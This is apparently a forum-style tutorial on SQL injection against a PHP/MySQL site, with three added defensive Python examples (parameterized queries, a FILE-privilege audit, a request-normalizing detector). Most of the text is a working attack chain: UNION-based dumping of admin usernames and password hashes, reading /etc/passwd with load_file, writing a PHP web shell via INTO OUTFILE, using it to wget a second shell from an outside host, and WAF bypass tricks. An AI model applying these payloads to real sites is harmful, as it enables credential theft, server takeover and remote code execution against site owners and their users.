################
1. What is SQLi ?
################
SQL injection is an attack most often seen against websites. It is carried out by injecting SQL commands into the site's MySQL database, typically to get user or admin passwords.
The vulnerability arises when user input is either incorrectly filtered for string-literal escape characters embedded in SQL statements, or is not strongly typed and is unexpectedly executed. SQL commands are thus injected from the web form into the application's database (as queries) to change the database content or dump the database information.
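The two causes named above (unfiltered quote characters and an id that is not strongly typed), shown next to the fix, as an added example that is not part of the original tutorial. It assumes Python with an in-memory SQLite database standing in for the site's MySQL database; the table contents and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the article database (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?)",
                   [(4123, "Hello"), (4124, "Unpublished draft")])
    return db

def get_article_vulnerable(db, raw_id):
    # The request value is pasted into the SQL text, so the database
    # parses whatever the client sent as part of the statement.
    sql = "SELECT id, title FROM articles WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def get_article_safe(db, raw_id):
    # Strong typing: anything that is not a plain decimal id is rejected.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be an integer")
    # Placeholder binding: the value travels as data and is never parsed as SQL.
    return db.execute("SELECT id, title FROM articles WHERE id = ?",
                      (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # Numeric form of the tautology probe: the WHERE clause stops filtering.
    print(get_article_vulnerable(db, "4123 or 1=1"))
    # The single-quote probe breaks the statement (the "error" a tester looks for).
    try:
        get_article_vulnerable(db, "4123'")
    except sqlite3.OperationalError as exc:
        print("database error:", exc)
    print(get_article_safe(db, "4123"))
```

With the safe version, both probes are rejected before any SQL runs, and a well-formed id returns exactly one row.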
################
1. Checking vulnerability.
################
There are many ways to check for the vulnerability; here are some:
Code:
'
+and+1=1
'+or+'1'='1
'+OR+'x'='x -> x = anything
So let's take the simplest string, " ' ", and add it to the end of the URL, for example:
Code:
http://example.com/article.php?id=4123'
Now if the site is vulnerable you should find an error. An error by itself doesn't usually mean that the site is vulnerable; the site could also be missing some content, like images, text, or the whole page.
################
2. Getting Columns.
################
It's pretty simple to get the number of columns from a website: ORDER BY is used to find the column count.
Here is an example on our test site:
Code:
http://example.com/article.php?id=4123+order+by+1--
After trying order+by+1-- our website opens normally, so let's keep ordering by higher columns until we get some change on the website.
Code:
http://example.com/article.php?id=4123+order+by+2--
Code:
http://example.com/article.php?id=4123+order+by+3--
Code:
http://example.com/article.php?id=4123+order+by+4--
Code:
http://example.com/article.php?id=4123+order+by+5--
Code:
http://example.com/article.php?id=4123+order+by+6--
Code:
http://example.com/article.php?id=4123+order+by+7--
Let's say that on order+by+7-- we get some change, for example some content is missing. Ordering by column 7 fails because the query has no seventh column.
So now we know there are 6 columns. The next step is the UNION command.
################
3. UNION Command.
################
The UNION command helps us gather data from a certain table, for example:
UNION SELECT column_name(s) FROM table_name2
So let's return to our example. The UNION command in our example would look like:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,5,6--
Now we should get a valid column on the page, which we can use to get the other information we need. In some cases the valid column is not shown. There is a trick for that: adding - before the id value, as in id=-4123.
The second way is adding +and+1=1 before union.
Then our example would look like this:
1.
Code:
http://example.com/article.php?id=-4123+union+all+select+1,2,3,4,5,6--
2.
Code:
http://example.com/article.php?id=4123+and+1=1+union+all+select+1,2,3,4,5,6--
################
4. MySQL Version.
################
After getting a valid (visible) column, it's time to check the MySQL version.
In the valid column, type version(); it would display the version of MySQL.
Let's say the valid column in our example is 5.
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,version(),6--
You should also check:
Code:
version() - displays the MySQL version
user() - displays the MySQL user
database() - displays the MySQL database in use
There are two types of versions, MySQL 4 and MySQL 5.
################
5. Table_name & Column_name
################
This step is closely connected to the previous one: if you got MySQL version 4, you have to guess tables and columns.
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,5,6+from+Table--
The example would look like this:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,5,6+from+admin--
I provided the most commonly used tables in the next file:
Code:
http://pastebin.com/raw.php?i=pGUVF8rz
If you get an error, or content is missing, you got the wrong table. If you haven't got any errors, or the page displays the same, you got it right.
The next step is to get the columns:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,username,6+from+admin--
The procedure for getting columns is the same: if you got it right you should get the username of some user; if not, you should get an error, and then you have to guess the right column name. Let's say you got the right columns: username, password.
I've provided the most commonly used columns:
Code:
http://pastebin.com/raw.php?i=QriucXqg
Let's get them showing in one statement using CONCAT; CONCAT helps you combine two columns, like username:password.
Our injection using CONCAT on table=ADMIN with known columns=USERNAME & PASSWORD would look like this:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,concat(column1,column2),6+from+admin--
Now we know 2 column names, so let's concat them:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,concat(username,password),6+from+admin--
Now the output of this injection would look like:
Code:
admin,21232f297a57a5a743894a0e4a801fc3
The password is an MD5 hash; I guess you know how to crack them.
If you don't like the separator between the columns, you can modify it using HEX.
Code:
http://www.ascii.cl/htmlcodes.htm
Find the hex value of the symbol you want; for example, the hex value of " : " is 3A. To use hex in SQL you have to put 0x before the hex value, so in our case it would look like this:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,concat(username,0x3a,password),6+from+admin--
The output would look like:
Code:
admin:21232f297a57a5a743894a0e4a801fc3
Now let's get back to MySQL version 5.
This version is the most used nowadays, and it has more options which an attacker can use.
Getting tables in MySQL version 5 is much easier: we use group_concat, or just concat (with LIMIT), on information_schema.
information_schema is an ANSI-standard set of read-only views which provide information about all of the tables, views, columns, and procedures in a database. It can be used as a source of the information which some databases make available through non-standard commands.
An example of gathering tables from information_schema is:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,group_concat(table_name),6+from+information_schema.tables--
This will list all table names in all databases. We don't need that, because we have no use for the tables in information_schema; we need the tables from the currently used database.
We can gather tables from the currently used database using table_schema.
The example would look like:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,group_concat(table_name),6+from+information_schema.tables+WHERE+table_schema=database()--
This will list all tables in the current database. The WHERE clause in SQL specifies that the statement should only affect rows that meet the specified criteria, in our case what comes after "=".
Now let's say we got the table admin, and we want to get the columns from that table.
Our injection would look like this:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,group_concat(column_name),6+from+information_schema.columns+WHERE+table_name=admin--
Now if we don't get anything, magic_quotes is On and we need to hex our table name. You can use any online ASCII -> HEX converter; here is one:
Code:
http://www.dolcevie.com/js/converter.html
HEX of admin = 61646d696e
Now let's inject to get the columns:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,group_concat(column_name),6+from+information_schema.columns+WHERE+table_name=0x61646d696e--
Don't forget to add 0x before the hex.
Now let's assume we got username and password; the procedure is the same:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,concat(username,0x3a,password),6+from+admin--
################
6. Load_file / Into Outfile
################
Load File: Reads the file and returns the file contents as a string.
Into OutFile: Writes the selected rows to a file. The file is created on the server host, so you must have the file privilege to use this syntax. File to be written cannot be an existing file, which among other things prevents files (such as "/etc/passwd") and database tables from being destroyed.
With load_file we can read files such as /etc/passwd.
If we want to read a file, we can easily do that with:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,load_file('/etc/passwd'),6--
If the site returns an error, there is no use reading further.
If we get a blank page, then magic_quotes is On; in that case we can hex the path or use its ASCII value.
Code:
http://www.dolcevie.com/js/converter.html
HEX value of /etc/passwd = 2f6574632f706173737764
So the injection would look like:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,load_file(0x2f6574632f706173737764),6--
The page should contain the passwd file. If you can view /etc/passwd without hexing, then magic_quotes is OFF and you can continue.
INTO OUTFILE helps us create a new file. For a successful injection, magic_quotes has to be OFF, we need file_priv, and we need to know the full path of public_html.
To find out whether we have file_priv, we can look into the mysql schema, if it exists.
In step 4 I showed you how to get the version:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,version(),6--
The same step works for the user:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,user(),6--
Now let's say our output is user@localhost.
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,concat(user,0x3a,file_priv),6+from+mysql.user--
The output would look something like:
Code:
root:Y
user:Y
If our user has Y, then we have file_priv; if not .....
To find the full path of the site we need to cause an error; once you have it, let's say it's /home/slixme/public_html/.
There are many queries for INTO OUTFILE; we'll use CMD:
Code:
http://example.com/article.php?id=4123+union+all+select+null,null,null,null,"<? system($_GET['cmd']); ?>",null+into+outfile+'/home/slixme/public_html/shell.php'--
Change all columns to null except the one used for the injection. After injecting this you can go to:
Code:
http://example.com/shell.php
And using the cmd parameter, let's get our shell:
Code:
http://example.com/shell.php?cmd=wget www.website.com/slixme.txt;mv slixme.txt slixme.php
The wget command will download slixme.txt (our PHP shell as a .txt file) to the site, and the mv command will rename it to slixme.php so it can be executed.
If you find yourself in a position in which you can't get the full path of the site, you can use INTO OUTFILE to dump certain columns into a .txt file.
Let's say you want to dump:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,concat(username,0x3a,password),6+from+admin--
Now find a writable directory on the server; most (almost all; on Linux, all) servers chmod their tmp folder to 777 (writable).
So let's dump the usernames and passwords so you can download them:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,concat(username,0x3a,password),6+from+admin+into+outfile+'/tmp/userpass.txt'--
Now the username:password pairs have been dumped into the userpass.txt file; let's open it using load_file:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,load_file('/tmp/userpass.txt'),6-
You should get the dump.
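Both load_file and INTO OUTFILE depend on the FILE privilege and on the server's secure_file_priv setting, so those are the two things to audit on the database side. The following added example (not from the original tutorial) parses SHOW GRANTS output and interprets secure_file_priv; the account names and grant lines are constructed sample data.

```python
import re

GRANT_RE = re.compile(r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO (?P<who>\S+)", re.I)

def file_capable_accounts(show_grants_lines):
    """Return accounts whose global grants include FILE (or ALL PRIVILEGES)."""
    risky = set()
    for line in show_grants_lines:
        m = GRANT_RE.match(line.strip())
        if not m or m.group("scope") != "*.*":
            continue  # FILE is a global privilege, so it only appears ON *.*
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if privs & {"FILE", "ALL PRIVILEGES"}:
            risky.add(m.group("who").replace("`", "").replace("'", ""))
    return sorted(risky)

def secure_file_priv_state(value):
    """Interpret the secure_file_priv system variable."""
    if value is None:
        return "disabled"      # NULL: file import and export are refused
    if value == "":
        return "unrestricted"  # empty: any path the mysqld OS user can reach
    return "restricted"        # a directory: file operations limited to it

def audit(show_grants_lines, secure_file_priv, app_account):
    """List what to fix for the account the web application connects as."""
    findings = []
    if app_account in file_capable_accounts(show_grants_lines):
        findings.append(f"{app_account} holds FILE: revoke it")
    if secure_file_priv_state(secure_file_priv) == "unrestricted":
        findings.append("secure_file_priv is empty: set it to NULL "
                        "or to a directory outside the web root")
    return findings

# Constructed SHOW GRANTS output for three accounts.
SAMPLE_GRANTS = [
    "GRANT SELECT, INSERT, FILE ON *.* TO `webapp`@`localhost`",
    "GRANT SELECT ON `site`.* TO `reports`@`localhost`",
    "GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` WITH GRANT OPTION",
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_GRANTS, "", "webapp@localhost"):
        print(finding)
```

An application account limited to its own schema, as in the second grant line, also cannot read mysql.user, which removes the file_priv lookup shown earlier.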
################
7. WAF - Web application firewall
################
An application firewall is a form of firewall which controls input, output, and/or access from, to, or by an application or service. It operates by monitoring and potentially blocking the input, output, or system service calls which do not meet the configured policy of the firewall. The application firewall is typically built to control all network traffic on any OSI layer up to the application layer. It is able to control applications or services specifically, unlike a stateful network firewall which is - without additional software - unable to control network traffic regarding a specific application. There are two primary categories of application firewalls, network-based application firewalls and host-based application firewalls.
More info:
Code:
https://www.owasp.org/index.php/Web_Application_Firewall
http://www.akamai.com/dl/brochures/Product_Brief_Kona_WAF.pdf
The first sign of a WAF during SQL injection shows up on the UNION command:
Code:
http://example.com/article.php?id=-4123+union+all+select+1,2,3,4,5,6--
We get an error 403 Forbidden.
There are multiple ways of bypassing a WAF; the simplest one is:
Code:
http://example.com/article.php?id=-4123/**/union/**/select/**/1,2,3,4,5,6/*
We have successfully bypassed the WAF.
Now the bypass depends on your imagination and inspiration.
I provided you with some WAF bypasses:
Code:
http://pastebin.com/XaQfMQCp
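From the defender's side, the comment trick above works because the filter matched the raw request text, while MySQL treats /**/ as whitespace. The added example below (not part of the original tutorial, and not any WAF product's rule set) normalizes the query string before matching and tags each stage of the walkthrough; the rule names and patterns are assumptions chosen for illustration.

```python
import re
from urllib.parse import unquote_plus

# One rule per stage of the walkthrough; matched on normalized text only.
RULES = {
    "quote_probe":  re.compile(r"'\s*(or|and)\s*'|'\s*$"),
    "column_count": re.compile(r"\border by \d+"),
    "union_select": re.compile(r"\bunion (all )?select\b"),
    "schema_enum":  re.compile(r"\binformation_schema\.|\bmysql\.user\b"),
    "file_access":  re.compile(r"\bload_file ?\(|\binto (out|dump)file\b"),
}

def normalize(query_string):
    """Reduce a raw query string to roughly what the SQL parser will see."""
    s = query_string
    for _ in range(3):                            # undo repeated URL encoding
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)  # /**/ acts as whitespace
    s = re.sub(r"/\*.*$", " ", s, flags=re.S)     # unterminated trailing /*
    return re.sub(r"\s+", " ", s).strip().lower()

def classify(query_string):
    """Return the sorted names of the rules that match after normalization."""
    norm = normalize(query_string)
    return sorted(name for name, rx in RULES.items() if rx.search(norm))

def naive_match(query_string):
    """A literal keyword rule applied to the raw request, for comparison."""
    return "union+all+select" in query_string.lower()

def scan(requests):
    """Map each suspicious query string to the stages it matches."""
    return {q: tags for q in requests if (tags := classify(q))}

# Query strings taken from the URLs on this page, plus one benign request.
SAMPLES = [
    "id=4123",
    "id=4123'",
    "id=4123+order+by+7--",
    "id=-4123+union+all+select+1,2,3,4,5,6--",
    "id=-4123/**/union/**/select/**/1,2,3,4,5,6/*",
    "id=4123+union+all+select+1,2,3,4,load_file(0x2f6574632f706173737764),6--",
]

if __name__ == "__main__":
    for query, tags in scan(SAMPLES).items():
        print(tags, naive_match(query), query)
```

The fifth sample is the request that got past the 403: naive_match misses it, while classify reports union_select because the comments are removed before the rule runs.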
################
8. The End
################
contact me please, we need to talk... TJOMGWIRE@programmer.net Kanishk Bhargava
so.. where can we meet?